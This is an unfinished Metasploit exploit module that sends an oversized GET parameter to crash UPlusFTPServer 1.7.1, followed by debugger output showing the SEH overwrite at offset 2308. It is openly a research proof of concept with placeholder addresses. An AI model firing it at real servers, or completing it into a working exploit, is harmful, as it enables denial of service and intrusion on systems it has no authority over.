##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

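class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpClient

	# Registers the module metadata with the framework.
	#
	# The 'Name' is tagged [INCOMPLETE] on purpose: 'Description' is still a
	# placeholder and the single target carries a 0x41414141 'Ret' marker
	# rather than a real address, so this module is a crash PoC rather than
	# a working exploit (see the debugger notes at the end of the file).
	#
	# @param info [Hash] metadata overrides merged by update_info
	def initialize(info={})
		super(update_info(info,
			'Name'           => "[INCOMPLETE] UPlusFTPServer v1.7.1 GET Request Buffer Overflow",
			'Description'    => %q{Module Description},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Karn Ganeshen',
					'corelanc0d3r',
					'sinn3r'
				],
			'References'     =>
				[
					['URL', 'http://www.exploit-db.com/exploits/14496/']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00",
					'StackAdjustment' => -3500
				},
			'DefaultOptions' =>
				{
					'ExitFunction' => "seh",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Universal', {'Ret'=>0x41414141}]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Apr 1 2011",
			'DefaultTarget'  => 0))
	end

	# Vulnerability check.
	#
	# The intended fingerprint is not implemented yet. It was meant to look at
	# three things in the server's response to an unauthenticated request:
	#   - 401 Unauthorized
	#   - Server: UplusFtp Server/1.0
	#   - WWW-Authenticate: BASIC realm="Login to UplusFtp Server"
	# and then attempt to authenticate.
	#
	# Until that is written, report the state as undetermined instead of
	# falling through with nil, which is not a CheckCode the framework
	# understands.
	#
	# @return [Msf::Exploit::CheckCode] always CheckCode::Unknown for now
	def check
		Exploit::CheckCode::Unknown
	end

	# Sends a single GET to /list.html whose 'path' query parameter is an
	# oversized marker buffer.
	#
	# The buffer is a plain A/B/C/D marker pattern, not a payload; the
	# "BBBB"/"CCCC" groups appear to correspond to the 42424242/43434343
	# values in the !exchain output at the end of the file. The total length
	# is capped at 4000 bytes because a larger request makes the server reset
	# the connection before anything happens.
	#
	# @return [void]
	def exploit
		# Credentials come from the datastore; fall back to an anonymous login.
		user = datastore['BasicAuthUser'] || "anonymous"
		pass = datastore['BasicAuthPass'] || ""
		cred = "#{user}:#{pass}"

		print_status("#{rhost}:#{rport} - Using credential '#{cred}'")

		# Layout: 2308 bytes of padding, two 4-byte marker groups, then filler
		# up to the 4000-byte cap (anything larger resets the connection).
		buf = "A" * 2308
		buf << "BBBB"
		buf << "CCCC"
		buf << "D" * (4000 - buf.length) # 4000 = max

		print_status("#{rhost}:#{rport} - Sending #{self.name}...")
		res = send_request_cgi({
			'method'     => 'GET',
			'uri'        => '/list.html',
			'basic_auth' => cred,
			'vars_get'   => { 'path' => buf }
		})

		# send_request_cgi hands back nil when no response arrives (e.g. the
		# connection was reset); say so instead of printing an empty line.
		if res
			print_line(res.to_s)
		else
			print_status("#{rhost}:#{rport} - No response received")
		end
	end
end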

=begin
The PoC on Exploit-DB does not appear to be reliable.
Also, the only component that is not protected by SafeSEH is ftpbasicsvr.

0:001> g
(d3c.abc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=008a3d39 ebx=00000061 ecx=008a3b61 edx=00000001 esi=44444444 edi=00000000
eip=0040277e esp=009ce198 ebp=008a3b3c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
ftpbasicsvr+0x277e:
0040277e 3a1e            cmp     bl,byte ptr [esi]          ds:0023:44444444=??
0:001> !exchain
009ced28: 43434343
Invalid exception stack at 42424242
0:001> lmf
start    end        module name
00400000 00445000   ftpbasicsvr C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
662b0000 66308000   hnetcfg  C:\WINDOWS\system32\hnetcfg.dll
71a50000 71a8f000   mswsock  C:\WINDOWS\system32\mswsock.dll
71a90000 71a98000   wshtcpip C:\WINDOWS\System32\wshtcpip.dll
71aa0000 71aa8000   WS2HELP  C:\WINDOWS\system32\WS2HELP.dll
71ab0000 71ac7000   WS2_32   C:\WINDOWS\system32\WS2_32.dll
76390000 763ad000   IMM32    C:\WINDOWS\system32\IMM32.DLL
77c10000 77c68000   msvcrt   C:\WINDOWS\system32\msvcrt.dll
77dd0000 77e6b000   ADVAPI32 C:\WINDOWS\system32\ADVAPI32.dll
77e70000 77f02000   RPCRT4   C:\WINDOWS\system32\RPCRT4.dll
77f10000 77f59000   GDI32    C:\WINDOWS\system32\GDI32.dll
77fe0000 77ff1000   Secur32  C:\WINDOWS\system32\Secur32.dll
7c800000 7c8f6000   kernel32 C:\WINDOWS\system32\kernel32.dll
7c900000 7c9af000   ntdll    C:\WINDOWS\system32\ntdll.dll
7e410000 7e4a1000   USER32   C:\WINDOWS\system32\USER32.dll
0:001> lmv m ftpbasicsvr
start    end        module name
00400000 00445000   ftpbasicsvr C (no symbols)           
    Loaded symbol image file: C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
    Image path: C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
    Image name: ftpbasicsvr.exe
    Timestamp:        Sun Apr 11 23:02:48 2010 (4BC2B788)
    CheckSum:         00000000
    ImageSize:        00045000
    Translations:     0000.04b0 0000.04e4 0409.04b0 0409.04e4

=end